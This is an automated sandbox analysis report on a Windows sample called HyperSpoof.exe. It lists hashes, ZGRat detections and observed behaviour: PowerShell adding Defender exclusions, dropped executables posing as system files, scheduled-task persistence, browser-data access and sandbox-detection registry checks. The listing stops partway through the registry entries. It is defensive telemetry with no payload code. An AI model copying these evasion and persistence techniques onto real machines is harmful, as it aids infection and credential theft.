Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
09-05-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
HyperSpoof.exe
Resource
win7-20240508-en
General
-
Target
HyperSpoof.exe
-
Size
172KB
-
MD5
ca27199cf4415233d9297b430dcf9924
-
SHA1
8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4
-
SHA256
71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e
-
SHA512
af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac
-
SSDEEP
1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0009000000023415-31.dat family_zgrat_v1 behavioral2/files/0x0009000000023428-98.dat family_zgrat_v1 behavioral2/memory/3556-100-0x0000000000AE0000-0x0000000000CE4000-memory.dmp family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1236 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1972 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3516 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4976 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 812 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3648 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5088 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 932 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 752 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3992 228 schtasks.exe 116 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3112 228 schtasks.exe 116 -
Nirsoft 2 IoCs
Processes:
resource yara_rule behavioral2/files/0x000a00000002340c-25.dat Nirsoft behavioral2/files/0x000700000002341e-80.dat Nirsoft -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 2 4708 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2680 powershell.exe 3780 powershell.exe 1224 powershell.exe 2136 powershell.exe 1848 powershell.exe 3372 powershell.exe 2120 powershell.exe 4708 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
HpsrSpoof.exesphyperRuntimedhcpSvc.execonhostsft.exeWScript.exesphyperRuntimedhcpSvc.exeHyperSpoof.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation HpsrSpoof.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation sphyperRuntimedhcpSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation conhostsft.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation sphyperRuntimedhcpSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation HyperSpoof.exe -
Executes dropped EXE 64 IoCs
Processes:
HpsrSpoof.exesphyperRuntimedhcpSvc.execonhostsft.exeVolumeid64.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exesphyperRuntimedhcpSvc.exe.conhostsft.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.execonhost.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVC_redist.x64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exepid Process 1324 HpsrSpoof.exe 2632 sphyperRuntimedhcpSvc.exe 1672 conhostsft.exe 3456 Volumeid64.exe 2444 DevManView.exe 4424 DevManView.exe 1276 DevManView.exe 1912 DevManView.exe 1156 DevManView.exe 3084 DevManView.exe 3424 DevManView.exe 3732 DevManView.exe 3140 DevManView.exe 1976 DevManView.exe 1540 DevManView.exe 1340 DevManView.exe 2760 DevManView.exe 2824 DevManView.exe 4984 DevManView.exe 3556 sphyperRuntimedhcpSvc.exe 1908 .conhostsft.exe 3652 AMIDEWINx64.exe 1984 AMIDEWINx64.exe 2328 AMIDEWINx64.exe 4880 AMIDEWINx64.exe 440 AMIDEWINx64.exe 1428 AMIDEWINx64.exe 1440 AMIDEWINx64.exe 4676 AMIDEWINx64.exe 812 AMIDEWINx64.exe 1396 AMIDEWINx64.exe 4880 AMIDEWINx64.exe 3064 AMIDEWINx64.exe 2268 AMIDEWINx64.exe 3488 AMIDEWINx64.exe 3592 AMIDEWINx64.exe 3184 AMIDEWINx64.exe 1348 AMIDEWINx64.exe 4920 AMIDEWINx64.exe 1276 AMIDEWINx64.exe 2616 AMIDEWINx64.exe 4524 conhost.exe 3404 AMIDEWINx64.exe 4988 AMIDEWINx64.exe 2168 AMIDEWINx64.exe 2240 AMIDEWINx64.exe 2732 AMIDEWINx64.exe 4056 AMIDEWINx64.exe 732 AMIDEWINx64.exe 3832 AMIDEWINx64.exe 4680 AMIDEWINx64.exe 856 AMIDEWINx64.exe 2600 Volumeid64.exe 2488 Volumeid64.exe 4708 Volumeid64.exe 2500 VC_redist.x64.exe 1816 Volumeid64.exe 3140 Volumeid64.exe 452 Volumeid64.exe 3372 Volumeid64.exe 4520 Volumeid64.exe 3516 Volumeid64.exe 1196 Volumeid64.exe 3592 Volumeid64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 30 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription ioc Process File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe -
Maps connected drives based on registry 3 TTPs 64 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe -
Drops file in System32 directory 4 IoCs
Processes:
.conhostsft.exepowershell.exeVC_redist.x64.exedescription ioc Process File opened for modification C:\Windows\system32\MRT.exe .conhostsft.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe VC_redist.x64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
VC_redist.x64.exedescription pid Process procid_target PID 2500 set thread context of 2368 2500 VC_redist.x64.exe 296 -
Drops file in Program Files directory 7 IoCs
Processes:
sphyperRuntimedhcpSvc.exedescription ioc Process File created C:\Program Files\Common Files\DESIGNER\csrss.exe sphyperRuntimedhcpSvc.exe File opened for modification C:\Program Files\Common Files\DESIGNER\csrss.exe sphyperRuntimedhcpSvc.exe File created C:\Program Files\Common Files\DESIGNER\886983d96e3d3e sphyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Common Files\SearchApp.exe sphyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Common Files\38384e6a620884 sphyperRuntimedhcpSvc.exe File created C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe sphyperRuntimedhcpSvc.exe File created C:\Program Files\Reference Assemblies\Microsoft\e1ef82546f0b02 sphyperRuntimedhcpSvc.exe -
Drops file in Windows directory 6 IoCs
Processes:
sphyperRuntimedhcpSvc.exeDevManView.exeDevManView.exedescription ioc Process File created C:\Windows\en-US\088424020bedd6 sphyperRuntimedhcpSvc.exe File opened for modification C:\Windows\INF\setupapi.dev.log DevManView.exe File opened for modification C:\Windows\INF\setupapi.dev.log DevManView.exe File created C:\Windows\ja-JP\fontdrvhost.exe sphyperRuntimedhcpSvc.exe File created C:\Windows\ja-JP\5b884080fd4f94 sphyperRuntimedhcpSvc.exe File created C:\Windows\en-US\conhost.exe sphyperRuntimedhcpSvc.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 2428 sc.exe 4112 sc.exe 2904 sc.exe 3348 sc.exe 3660 sc.exe 1572 sc.exe 4692 sc.exe 2344 sc.exe 1296 sc.exe 2136 sc.exe 2112 sc.exe 1216 sc.exe 1824 sc.exe 632 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LocationInformation DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGUID DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ContainerID DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LocationInformation DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Control DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\ 